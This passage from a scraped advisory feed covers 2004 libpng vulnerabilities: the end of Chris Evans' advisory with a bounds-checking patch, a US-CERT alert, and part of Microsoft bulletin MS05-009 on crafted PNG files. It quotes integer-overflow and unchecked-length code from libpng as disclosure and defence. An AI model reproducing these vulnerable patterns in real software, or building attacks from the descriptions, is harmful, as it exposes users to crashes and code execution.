in\r\npng_handle_hIST).\r\n\r\nAlthough seemingly not exploitable, there is dangerous code in this function.\r\nIt relies on checks scattered elsewhere in the code in order to not overflow\r\na 4-byte stack buffer. This line here should upper-bound the read onto the\r\nstack to 4 bytes:\r\n\r\n png_crc_read(png_ptr, buf, truelen);\r\n\r\n\r\n3) Possible NULL-pointer crash in png_handle_iCCP (pngrutil.c) (this flaw is\r\nduplicated in multiple other locations).\r\n\r\nThere are lots of lines such as these in the code:\r\n\r\n chunkdata = (png_charp)png_malloc(png_ptr, length + 1);\r\n\r\nWhere "length" comes from the PNG. If length is set to UINT_MAX then length + 1 will equate to\r\nzero, leading to the PNG malloc routines to return NULL and\r\nsubsequent access to crash. These lengths are sometimes checked to ensure\r\nthey are smaller that INT_MAX, but it is not clear that all code paths perform\r\nthis check, i.e. png_push_read_chunk in pngpread.c does not do this check\r\n(this is progressive reading mode as used by browsers).\r\n\r\n\r\n4) Theoretical integer overflow in allocation in png_handle_sPLT (pngrutil.c)\r\n\r\nThis isn't likely to cause problems in practice, but there's the possibility\r\nof an integer overflow during this allocation:\r\n\r\n new_palette.entries = (png_sPLT_entryp)png_malloc(\r\n png_ptr, new_palette.nentries * sizeof(png_sPLT_entry));\r\n\r\n\r\n5) Integer overflow in png_read_png (pngread.c)\r\n\r\nA PNG with excessive height may cause an integer overflow on a memory\r\nallocation and subsequent crash allocating row pointers. This line is possibly\r\nfaulty; I can't see anywhere that enforces a maximum PNG height:\r\n\r\n info_ptr->row_pointers = (png_bytepp)png_malloc(png_ptr,\r\n info_ptr->height * sizeof(png_bytep));\r\n\r\n\r\n6) Integer overflows during progressive reading.\r\n\r\nThere are many lines like the following, which are prone to integer overflow:\r\n\r\n if (png_ptr->push_length + 4 > png_ptr->buffer_size)\r\n\r\nIt is not clear how dangerous this is.\r\n\r\n\r\n7) Other flaws.\r\n\r\nThere is broad potential for other integer overflows which I have not spotted -\r\nthe amount of integer arithmetic surrounding buffer handling is large,\r\nunfortunately.\r\n\r\n\r\nCESA-2004-001 - rev 3\r\nChris Evans\r\nchris@scary.beasts.org\r\n\r\n[Advertisement: I am interested in moving into a security related field\r\n full-time. E-mail me to discuss.]\r\n\r\n\r\ndiff -ru libpng-1.2.5/png.h libpng-1.2.5.fix/png.h\r\n--- libpng-1.2.5/png.h 2002-10-03 12:32:26.000000000 +0100\r\n+++ libpng-1.2.5.fix/png.h 2004-07-13 23:18:10.000000000 +0100\r\n@@ -835,6 +835,9 @@\r\n /* Maximum positive integer used in PNG is (2^31)-1 */\r\n #define PNG_MAX_UINT ((png_uint_32)0x7fffffffL)\r\n\r\n+/* Constraints on width, height, (2 ^ 24) - 1*/\r\n+#define PNG_MAX_DIMENSION 16777215\r\n+\r\n /* These describe the color_type field in png_info. */\r\n /* color type masks */\r\n #define PNG_COLOR_MASK_PALETTE 1\r\ndiff -ru libpng-1.2.5/pngpread.c libpng-1.2.5.fix/pngpread.c\r\n--- libpng-1.2.5/pngpread.c 2002-10-03 12:32:28.000000000 +0100\r\n+++ libpng-1.2.5.fix/pngpread.c 2004-07-13 23:03:58.000000000 +0100\r\n@@ -209,6 +209,8 @@\r\n\r\n png_push_fill_buffer(png_ptr, chunk_length, 4);\r\n png_ptr->push_length = png_get_uint_32(chunk_length);\r\n+ if (png_ptr->push_length > PNG_MAX_UINT)\r\n+ png_error(png_ptr, "Invalid chunk length.");\r\n png_reset_crc(png_ptr);\r\n png_crc_read(png_ptr, png_ptr->chunk_name, 4);\r\n png_ptr->mode |= PNG_HAVE_CHUNK_HEADER;\r\n@@ -638,6 +640,8 @@\r\n\r\n png_push_fill_buffer(png_ptr, chunk_length, 4);\r\n png_ptr->push_length = png_get_uint_32(chunk_length);\r\n+ if (png_ptr->push_length > PNG_MAX_UINT)\r\n+ png_error(png_ptr, "Invalid chunk length.");\r\n\r\n png_reset_crc(png_ptr);\r\n png_crc_read(png_ptr, png_ptr->chunk_name, 4);\r\ndiff -ru libpng-1.2.5/pngrutil.c libpng-1.2.5.fix/pngrutil.c\r\n--- libpng-1.2.5/pngrutil.c 2004-07-13 13:36:37.000000000 +0100\r\n+++ libpng-1.2.5.fix/pngrutil.c 2004-07-13 23:43:02.000000000 +0100\r\n@@ -350,7 +350,11 @@\r\n png_crc_finish(png_ptr, 0);\r\n\r\n width = png_get_uint_32(buf);\r\n+ if (width > PNG_MAX_DIMENSION)\r\n+ png_error(png_ptr, "Width is too large");\r\n height = png_get_uint_32(buf + 4);\r\n+ if (height > PNG_MAX_DIMENSION)\r\n+ png_error(png_ptr, "Height is too large");\r\n bit_depth = buf[8];\r\n color_type = buf[9];\r\n compression_type = buf[10];\r\n@@ -675,7 +679,7 @@\r\n else\r\n truelen = (png_size_t)png_ptr->channels;\r\n\r\n- if (length != truelen)\r\n+ if (length != truelen || length > 4)\r\n {\r\n png_warning(png_ptr, "Incorrect sBIT chunk length");\r\n png_crc_finish(png_ptr, length);\r\n@@ -1244,7 +1248,8 @@\r\n /* Should be an error, but we can cope with it */\r\n png_warning(png_ptr, "Missing PLTE before tRNS");\r\n }\r\n- else if (length > (png_uint_32)png_ptr->num_palette)\r\n+ if (length > (png_uint_32)png_ptr->num_palette ||\r\n+ length > PNG_MAX_PALETTE_LENGTH)\r\n {\r\n png_warning(png_ptr, "Incorrect tRNS chunk length");\r\n png_crc_finish(png_ptr, length);\r\n@@ -1400,7 +1405,7 @@\r\n void /* PRIVATE */\r\n png_handle_hIST(png_structp png_ptr, png_infop info_ptr, png_uint_32 length)\r\n {\r\n- int num, i;\r\n+ unsigned int num, i;\r\n png_uint_16 readbuf[PNG_MAX_PALETTE_LENGTH];\r\n\r\n png_debug(1, "in png_handle_hIST\n");\r\n@@ -1426,8 +1431,8 @@\r\n return;\r\n }\r\n\r\n- num = (int)length / 2 ;\r\n- if (num != png_ptr->num_palette)\r\n+ num = length / 2 ;\r\n+ if (num != png_ptr->num_palette || num > PNG_MAX_PALETTE_LENGTH)\r\n {\r\n png_warning(png_ptr, "Incorrect hIST chunk length");\r\n png_crc_finish(png_ptr, length);\r\n@@ -2868,6 +2873,9 @@\r\n png_read_data(png_ptr, chunk_length, 4);\r\n png_ptr->idat_size = png_get_uint_32(chunk_length);\r\n\r\n+ if (png_ptr->idat_size > PNG_MAX_UINT)\r\n+ png_error(png_ptr, "Invalid chunk length.");\r\n+\r\n png_reset_crc(png_ptr);\r\n png_crc_read(png_ptr, png_ptr->chunk_name, 4);\r\n if (png_memcmp(png_ptr->chunk_name, (png_bytep)png_IDAT, 4))", "edition": 1, "modified": "2004-08-05T00:00:00", "published": "2004-08-05T00:00:00", "id": "SECURITYVULNS:DOC:6579", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6579", "title": "CESA-2004-001: libpng", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nMultiple Vulnerabilities in libpng\r\n\r\n Original release date: August 4, 2004\r\n Last revised: --\r\n Source: US-CERT\r\n\r\nSystems Affected\r\n\r\n Applications and systems that use the libpng library.\r\n\r\nOverview\r\n\r\n Several vulnerabilities exist in the libpng library, the most serious\r\n of which could allow a remote attacker to execute arbitrary code on an\r\n affected system.\r\n\r\nI. Description\r\n\r\n The Portable Network Graphics (PNG) image format is used as an\r\n alternative to other image formats such as the Graphics Interchange\r\n Format (GIF). The libpng is a popular reference library available for\r\n application developers to support the PNG image format.\r\n\r\n Several vulnerabilities have been reported in the libpng library. Any\r\n application or system that uses this library may be affected. More\r\n detailed information is available in the individual vulnerability\r\n notes:\r\n\r\n VU#388984 - libpng fails to properly check length of transparency\r\n chunk (tRNS) data\r\n\r\n A buffer overflow vulnerability has been discovered in the way that\r\n libpng processes PNG images. This vulnerability could allow a remote\r\n attacker to execute arbitrary code on a vulnerable system by\r\n introducing a specially crafted PNG image.\r\n (Other references: CAN-2004-0597)\r\n\r\n VU#236656 - libpng png_handle_iCCP() NULL pointer dereference\r\n\r\n Under some circumstances, a null pointer may be dereferenced during a\r\n memory allocation in the png_handle_iCCP() function. As a result, a\r\n PNG image with particular characteristics could cause the affected\r\n application to crash. Similar errors are reported to exist in other\r\n locations within libpng.\r\n (Other references: CAN-2004-0598)\r\n\r\n VU#160448 - libpng integer overflow in image height processing\r\n\r\n An integer overflow error exists in the handling of PNG image height\r\n within the png_read_png() function. As a result, a PNG image with\r\n excessive height may cause an integer overflow during a memory\r\n allocation operation, which could cause the affected application to\r\n crash.\r\n (Other references: CAN-2004-0599)\r\n\r\n VU#477512 - libpng png_handle_sPLT() integer overflow\r\n\r\n A potential integer overflow error exists during a memory allocation\r\n operation within the png_handle_sPLT() function. It is unclear what\r\n practical impact this error might have on applications using libpng.\r\n (Other references: CAN-2004-0599)\r\n\r\n VU#817368 - libpng png_handle_sBIT() performs insufficient bounds\r\n checking\r\n\r\n A potentially insufficient bounds check exists within the\r\n png_handle_sBIT() function. A similar error exists in the\r\n png_handle_hIST() function. While the code that contains these errors\r\n could potentially permit a buffer overflow to occur during a\r\n subsequent png_crc_read() operation, it is unclear what practical\r\n vulnerabilities it might present in applications using libpng.\r\n (Other references: CAN-2004-0597)\r\n\r\n VU#286464 - libpng contains integer overflows in progressive display\r\n image reading\r\n\r\n The libpng library provides the ability to display interlaced, or\r\n progressive display, PNG images. A number of potential integer\r\n overflow errors exist in libpng's handling of such progressive display\r\n images. While the code that contains these errors introduces dangerous\r\n conditions, it is unclear what practical vulnerabilities it might\r\n present in applications using libpng.\r\n (Other references: CAN-2004-0599)\r\n\r\nII. Impact\r\n\r\n In the case of VU#388984, an attacker with the ability to introduce a\r\n malformed PNG image to a vulnerable application could cause the\r\n application to crash or could potentially execute arbitrary code with\r\n the privileges of the user running the affected application.\r\n\r\n In the case of VU#236656 and VU#160448, an attacker with the ability\r\n to introduce a malformed PNG image to a vulnerable application could\r\n cause the application to crash.\r\n\r\n The impacts of the other vulnerabilities described above are unclear.\r\n\r\n A remote attacker could cause an application to crash or potentially\r\n execute arbitrary code by convincing a victim user to visit a\r\n malicious web site or view an email message containing a malformed\r\n image.\r\n\r\nIII. Solution\r\n\r\nApply a patch or upgrade\r\n\r\n Apply the appropriate patch or upgrade as specified by your vendor.\r\n For vendor-specific responses, please see your vendor's web site or\r\n the individual vulnerability notes.\r\n\r\n For individuals who rely on the original source of libpng, these\r\n issues have been resolved in libpng version 1.2.6rc1 (release\r\n candidate 1).\r\n\r\nAppendix A. References\r\n\r\n * Chris Evans Security Advisory 2004.1 -\r\n <http://scary.beasts.org/security/CESA-2004-001.txt>\r\n * libpng Homepage - <http://libpng.sourceforge.net>\r\n * Portable Network Graphics (PNG) Homepage -\r\n <http://www.libpng.org/pub/png>\r\n * US-CERT Vulnerability Note VU#388984 -\r\n <http://www.kb.cert.org/vuls/id/388984>\r\n * US-CERT Vulnerability Note VU#817368 -\r\n <http://www.kb.cert.org/vuls/id/817368>\r\n * US-CERT Vulnerability Note VU#286464 -\r\n <http://www.kb.cert.org/vuls/id/286484>\r\n * US-CERT Vulnerability Note VU#477512 -\r\n <http://www.kb.cert.org/vuls/id/477512>\r\n * US-CERT Vulnerability Note VU#160448 -\r\n <http://www.kb.cert.org/vuls/id/160448>\r\n * US-CERT Vulnerability Note VU#236656 -\r\n <http://www.kb.cert.org/vuls/id/236656>\r\n * CVE CAN-2004-0597 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597>\r\n * CVE CAN-2004-0598 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598>\r\n * CVE CAN-2004-0599 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599>\r\n _________________________________________________________________\r\n\r\n US-CERT thanks Chris Evans for researching and reporting these\r\n vulnerabilities.\r\n _________________________________________________________________\r\n\r\n Feedback can be directed to the US-CERT Technical Staff.\r\n _________________________________________________________________\r\n\r\n The latest copy of this document can be found at:\r\n\r\n <http://www.us-cert.gov/cas/techalerts/TA04-217A.html>\r\n\r\n Copyright 2004 Carnegie Mellon University. Terms of use\r\n\r\n Revision History\r\n\r\n Aug 4, 2004: Initial release\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.1 (GNU/Linux)\r\n\r\niD8DBQFBER8VXlvNRxAkFWARAtSFAKCGG0ALkKpzC3fhY3jlGZQDyzN5TgCg9g9c\r\nlQD3Z5OoJ30TQenb8/lwjn0=\r\n=d+t3\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2004-08-05T00:00:00", "published": "2004-08-05T00:00:00", "id": "SECURITYVULNS:DOC:6578", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6578", "title": "US-CERT Technical Cyber Security Alert TA04-217A -- Multiple Vulnerabilities in libpng", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "cvelist": ["CVE-2004-1244", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "Microsoft Security Bulletin MS05-009\r\nVulnerability in PNG Processing Could Allow Remote Code Execution (890261)\r\n\r\nIssued: February 8, 2005\r\nVersion: 1.0\r\n\r\nSummary\r\nWho should read this document: Customers who use Microsoft Windows Media Player, Windows Messenger and MSN Messenger\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update immediately\r\n\r\nSecurity Update Replacement: This bulletin replaces a prior security update. See the frequently asked questions (FAQ) section of this bulletin for the complete list.\r\n\r\nCaveats: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software: \r\n\r\n\u2022 Microsoft Windows Media Player 9 Series (when running on Windows 2000, Windows XP Service Pack 1 and Windows Server 2003) \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows Messenger version 5.0 (standalone version that can be installed on all supported operating systems) \u2013 Download the update\r\n \r\n\u2022 Microsoft MSN Messenger 6.1 \u2013 Download the update\r\n \r\n\u2022 Microsoft MSN Messenger 6.2 \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME) \u2013 Review the FAQ section of this bulletin for details about these operating systems.\r\n \r\n\r\nNon-Affected Software: \r\n\r\n\u2022 Windows Media Player 6.4\r\n \r\n\u2022 Windows Media Player 7.1\r\n \r\n\u2022 Windows Media Player for Windows XP (8.0)\r\n \r\n\u2022 Windows Media Player 9 Series for Windows XP Service Pack 2\r\n \r\n\u2022 Windows Media Player 10\r\n \r\n\u2022 MSN Messenger for Mac\r\n \r\n\r\nTested Microsoft Windows Components:\r\n\r\nAffected Components:\r\n\r\n\u2022 Microsoft Windows Messenger version 4.7.0.2009 (when running on Windows XP Service Pack 1) \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows Messenger version 4.7.0.3000 (when running on Windows XP Service Pack 2) \u2013 Download the update\r\n \r\n\r\nThe software in this list has been tested to determine if the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support lifecycle for your product and version, visit the following Microsoft Support Lifecycle Web site.\r\n\r\nTop of section\r\nGeneral Information\r\n Executive Summary \r\n\r\nExecutive Summary:\r\n\r\nThis update resolves a newly-discovered, public vulnerability. A remote code execution vulnerability exists in the processing of PNG image formats. The vulnerability is documented in the \u201cVulnerability Details\u201d section of this bulletin.\r\n\r\nAn attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\n\r\nVulnerability Identifiers Impact of Vulnerability Windows Media Player 9 Series CAN-2004-1244 Windows Messenger (All affected versions) CAN-2004-0597 MSN Messenger 6.1 and 6.2 CAN-2004-0597 \r\nPNG Processing Vulnerability- CAN-2004-1244\r\n Remote Code Execution\r\n Critical\r\n\r\n None\r\n None\r\n \r\nPNG Processing Vulnerability- CAN-2004-0597\r\n Remote Code Execution\r\n\r\n None\r\n Moderate\r\n Critical\r\n\r\n \r\nAggregate Severity of All Vulnerabilities\r\n \r\n Critical\r\n Moderate\r\n\r\n Critical\r\n\r\n \r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nTop of section\r\n Frequently asked questions (FAQ) related to this security update \r\n\r\nWhat updates does this release replace?\r\nThis security update replaces a prior security bulletin for Windows Media Player only. The security bulletin ID and version that is affected is listed in the following table.\r\n\r\nBulletin ID Windows Media Player 9 Series MSN Messenger 6.1 \r\nMS03-021\r\n Replaced\r\n \r\n \r\nMS04-010\r\n \r\n Replaced\r\n \r\n\r\nHow does the extended support for Windows 98, Windows 98 Second Edition, and Windows Millennium Edition affect the release of security updates for these operating systems?\r\nMicrosoft will only release security updates for critical security issues. Non-critical security issues are not offered during this support period. For more information about the Microsoft Support Lifecycle policies for these operating systems, visit the following Web site.\r\n\r\nFor more information about severity ratings, visit the following Web site.\r\n\r\nNote A Critical security update for these platforms is available and is provided as part of this security bulletin and can be downloaded from the Windows Update Web site.\r\n\r\nAre Windows 98, Windows 98 Second Edition, or Windows Millennium Edition critically affected by any of the vulnerabilities that are addressed in this security bulletin?\r\nYes. Windows 98, Windows 98 Second Edition, and Windows Millennium Edition are critically affected by this vulnerability. A Critical security update for these platforms is available and is provided as part of this security bulletin and can be downloaded from the Windows Update Web site.\r\nFor more information about severity ratings, visit the following Web site.\r\n\r\nHow can I get an update for MSN Messenger?\r\nAn update for MSN Messenger is available via the download link under the Affected Software section of this bulletin. Additionally, an updated version of MSN Messenger will be offered directly to customers when they log into MSN Messenger beginning shortly after this update is released.\r\n\r\nWhy is the update to Windows Messenger 5.0 an upgrade to version 5.1 instead of an update to 5.0?\r\nDue to the architecture of Windows Messenger 5.0, it is not possible to provide an incremental patch. Any fix to Windows Messenger 5.0 requires the deployment of a completely updated Windows Messenger package, in this case the Windows Messenger 5.1 package.\r\n\r\nWhat functionality changes will this new version of Windows Messenger contain?\r\nAs well as including the security fix pertaining to this bulletin; Windows Messenger 5.1 contains some additional bug fixes over Windows Messenger 5.0. Full details are on the Windows Messenger 5.1 download page.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) to determine if this update is required?\r\nMBSA will determine if this update is required for Windows Media Player. MBSA will not determine if this update is required for Windows Messenger or MSN Messenger. It will provide a note message to this effect. See Microsoft Knowledge Base Article 306460 for information regarding note messages in MBSA.\r\n\r\nMicrosoft has made available an Enterprise Update Scanning Tool (EST) to assist customers with the detection of needed security updates not currently supported by MBSA.\r\n\r\nFor detailed information about the programs that MBSA currently does not detect, see Microsoft Knowledge Base Article 306460\r\n\r\nWhat is the Enterprise Update Scanning Tool (EST)?\r\nAs part of an ongoing commitment to provide detection tools for bulletin-class security updates, Microsoft delivers a stand-alone detection tool whenever the Microsoft Baseline Security Analyzer (MBSA) and the Office Detection Tool (ODT) cannot detect whether the update is required for an MSRC release cycle. This stand-alone tool is called the Enterprise Update Scanning Tool (EST) and is designed for enterprise administrators. When a version of the Enterprise Update Scanning Tool is created for a specific bulletin, customers can run the tool from a command line interface (CLI) and view the results of the XML output file. To help customers better utilize the tool, detailed documentation will be provided with the tool. There is also a version of the tool that SMS customers can obtain that offers an integrated experience for SMS administrators.\r\n\r\nCan I use a version of the Enterprise Update Scanning Tool (EST) to determine whether this update is required?\r\nYes. Microsoft has created a version of the EST that will determine if you need to apply this update for all of the products listed under Affected Products above. Microsoft Knowledge Base Article 984193 describes the EST in detail, as well as provides a download link to the tool. There is also a version of this tool that SMS customers can obtain. See the following Microsoft Knowledge Base Article 894154.\r\n\r\nCan I use Systems Management Server (SMS) to determine if this update is required?\r\nYes. SMS can help detect and deploy this security update. SMS uses MBSA for detection; therefore, SMS has the same limitation listed earlier in this bulletin related to programs that MBSA does not detect. Additionally, there is a version of the EST that SMS customers can obtain that offers an integrated experience for SMS administrators. \r\nFor information about SMS, visit the SMS Web site.\r\n\r\nThe Security Update Inventory Tool is required for detecting Microsoft Windows and other affected Microsoft products. For more information about the limitations of the Security Update Inventory Tool, see Microsoft Knowledge Base Article 306460\r\n\r\nTop of section\r\n Vulnerability Details \r\n\r\n PNG Processing Vulnerability in Windows Media Player - CAN-2004-1244: \r\n\r\nA remote code execution vulnerability exists in Windows Media Player because it does not properly handle PNG files with excessive width or height values. An attacker could try to exploit the vulnerability by constructing a malicious PNG that could potentially allow remote code execution if a user visited a malicious Web site or clicked a link in a malicious e-mail message. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\n Mitigating Factors for PNG Processing Vulnerability in Windows Media Player- CAN-2004-1244: \r\n\r\n\u2022 In a Web-based attack scenario, an attacker would have to host a Web site that contains a Web page that is used to exploit this vulnerability through media containing a reference to a malicious PNG file. An attacker would have no way to force users to visit a Web site. Instead, an attacker would have to persuade them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site or to a site that has been compromised by the attacker.\r\n \r\n\u2022 An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n \r\n\r\nTop of section\r\n Workarounds for PNG Processing Vulnerability in Windows Media Player - CAN-2004-1244: \r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified below.\r\n\r\nThere are several different attack vectors that Microsoft has identified for this vulnerability. Each attack vector has a different workaround.\r\n\r\n Static WMP File Extension Attack workaround \r\n\r\nDisassociate the WMP file extensions.\r\nDisassociate the file extensions (.ASX, .WAX, .WVX, .WPL, .WMX, .WMS, .WMZ) in Windows to avoid previewing or opening files that point to malformed PNG files.\r\n\r\nManual Steps \u2013 Windows Media Player method:\r\n\r\n\u2022 Launch Windows Explorer\r\n \r\n\u2022 On the Tools Menu select \u2018Folder Options\u2019\r\n \r\n\u2022 Select the \u2018File Types\u2019 tab\r\n \r\n\u2022 Scroll to find the .ASX file extension and then press the \u2018Delete\u2019 button\r\n \r\n\u2022 Repeat step 4 for each of the file extensions listed above.\r\n \r\n\r\nIn addition, enterprise customers can configure Outlook to block the dangerous files listed using the steps documented in Microsoft Knowledgebase Article 837388. Use these instructions to add the documented file extensions to the Level1 block list.\r\n\r\nHome users can configure Outlook Express to block the dangerous files listed using the steps documented in Microsoft Knowledge Base Article 291387. Use this information to configure each of the file extensions as \u2018confirm open after download\u2019 in the Windows file types dialog.\r\n\r\nImpact of Workaround: Deleting the file associations with Media Player has a high potential for breaking corporate users who may be using Windows Media Server / Player to deliver web casts, training etc.\r\n\r\nHome users trying to watch streaming content on various Web sites may also be impacted by implementing this workaround.\r\n\r\nTop of section\r\n Internet Explorer workaround for WMP ActiveX attack \r\n\r\nDisable the Windows Media Player ActiveX Control. To prevent against an attack within a webpage follow these steps to disable the Windows Media Player ActiveX Control:\r\n\r\nFollow the instructions documented in Microsoft Knowledge Base Article 240797 to killbit the following CLSIDs in Internet Explorer:\r\n\r\nCLSID:{6BF52A52-394A-11D3-B153-00C04F79FAA6}PROGID:WMPlayer.OCX.7\r\nCLSID:{22D6F312-B0F6-11D0-94AB-0080C74C7E95}PROGID:MediaPlayer.MediaPlayer.1\r\nCLSID:{05589FA1-C356-11CE-BF01-00AA0055595A}PROGID:AMOVIE.ActiveMovieControl.2\r\n\r\nImpact of Workaround:\r\n\r\nWhen you disable the Windows Media Player ActiveX control, pages using this control will no longer function as designed. This prevents any content from being played though the control, including audio and video.\r\n\r\nTop of section\r\n Content-Type HTTP Header Attack \r\n\r\nThe only way to prevent this attack is to remove all of the possible MIME type entries from the registry that associate Windows Media Player with the MIME type listed in the Content-Type header being returned by the server since they all can be abused to exploit the vulnerability. Below is a list of MIME types that are associated with the WMP CLSID.\r\n\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\application/vnd.ms-wpl\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-mplayer2\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-ms-wmd\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-ms-wmz\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/aiff\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/basic\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mid\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/midi\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mp3\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mpeg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mpegurl\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mpg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/wav\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-aiff\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mid\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-midi\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mp3\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mpeg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mpegurl\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mpg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-ms-wax\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-ms-wma\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-wav\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\midi/mid\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/avi\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/mpeg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/mpg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/msvideo\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ivf\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-mpeg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-mpeg2a\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-asf\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-asf-plugin\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-msvideo\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wm\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wmp\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wmv\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wmx\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wvx\r\n\r\nImpact of Workaround:\r\n\r\n\u2022 These MIME type registry keys all have a CLSID value which points to the following CLSID:\r\nHKEY_CLASSES_ROOT\CLSID\{CD3AFA8F-B84F-48F0-9393-7EDC34128127}\InprocServer32\r\nThis CLSID is associated with WMP.DLL which is responsible for launching Windows Media Player when these MIME types are used. Un-registering WMP.DLL will break Windows Media Player.\r\n \r\n\u2022 The MIME types listed in this workaround are specific to Windows XP. There may be additional MIME types available on other platforms.\r\n \r\n\r\nAdditional information about Windows Media Player File Name Extensions if available at the following MSDN Web site.\r\n\r\nTop of section\r\nTop of section\r\n FAQ for PNG Processing Vulnerability in Windows Media Player - CAN-2004-1244: \r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nWhat causes the vulnerability?\r\nWindows Media Player does not completely validate PNG image formats with a excessive width or height values.\r\n\r\nWhat is PNG?\r\nPNG stands for Portable Network Graphics. The Portable Network Graphics (PNG) format was designed to replace the older and simpler GIF format and, to some extent, the much more complex TIFF format. Additional information about PNG can be found at the following Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could host a malformed PNG file on a Web site, network share, or persuade a user to open a PNG file that is sent as an attachment in email could seek to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by hosting a specially crafted PNG file on a Web site or network share, and entice a user to visit that Web site. Additionally, and attacker could send a link to a malicious PNG file in an email message and entice a user to click on the link.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if users who do not have sufficient administrative credentials are given the ability to log on to servers and run programs. However, best practices strongly discourage allowing this.\r\n\r\nAre Windows 98, Windows 98 Second Edition or Windows Millennium Edition critically affected by this vulnerability?\r\nWindows 98 is not critically affected by this vulnerability, however Windows 98 Second Edition, and Windows Millennium Edition are. A Critical security update for these platforms is available and is provided as part of this security bulletin and can be downloaded from the Windows Update Web site.\r\nFor more information about severity ratings, visit the following Web site.\r\n\r\nWhat does the update do?\r\nThe update addresses the vulnerability by modifying the way that Windows Media Player validates the width and height of a PNG file\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nA vulnerability similar to this has been publicly released and assigned Common 